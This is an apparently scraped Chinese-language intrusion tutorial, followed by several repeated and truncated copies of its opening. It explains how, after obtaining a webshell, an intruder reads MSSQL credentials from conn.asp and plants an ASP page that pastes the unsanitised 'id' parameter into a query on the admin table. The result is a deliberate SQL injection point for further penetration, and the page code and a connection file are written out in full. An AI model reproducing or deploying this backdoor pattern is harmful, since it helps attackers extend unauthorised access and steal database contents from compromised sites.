今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊
這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!
首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和
密碼,你要找到使用者名稱、密碼、資料庫所在的ip,然後連線上去,至於連線大家應該都會,找到**管理員的表
因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,**如下:
程式**
set rs=server.createobject("adodb.recordset")
id = request("id")
strsql = "select * from admin where id=" & id
rs.open strsql,conn,1,3
rs.close
%>
把strsql = "select * from admin where id=" & id 這句話裡面的admin換成要偽造的表名,注意必須存在
你可以連線上去看下表名就是了!這裡假設的是admin是表名!這個檔名隨便儲存!
然後就要構造乙個連線資料庫的檔案了,**如下:
程式**
strsqlservername = "000.000.000.000" 伺服器名稱或位址
strsqldbusername = "sqlname" 資料庫帳號
strsqldbpassword = "sqlpass" 資料庫密碼
strsqldbname = "sqldataname" 資料庫名稱
set conn = server.createobject("adodb.connection")
strcon = "provider=sqloledb.1;persist security info=false;server=" & strsqlservername & ";user id=" & strsqldbusername & ";password=" & strsqldbpassword & ";database=" & strsqldbname & ";"
conn.open strcon
%>
這裡應該都會了,就不羅嗦了,不過注意的是儲存的檔名要和include呼叫的名字一樣。。還是羅嗦話,
就這樣,正常情況下,就ok了,偽造成功……
自己構造注入點
一種是通過conn.asp獲知資料庫帳戶密碼以後 自己構造,另乙個是通過搜尋檢視源 構造注入點。第一種 適用條件 已經獲得 的資料庫鏈結檔案,但不是sa許可權 當然如果是mdb資料庫那就很簡單了,直接下下來就ok了,這裡只是針對mssql資料庫而言 由於入侵 並沒有注入漏洞所以,無法注入,但是我們可...
自己構造注入點方便入侵
自己構造注入點方便入侵 今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊 這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有m...
自己構造注入點方便入侵
首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和 因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,如下 程式 set rs server.createobject adodb.recordset id r...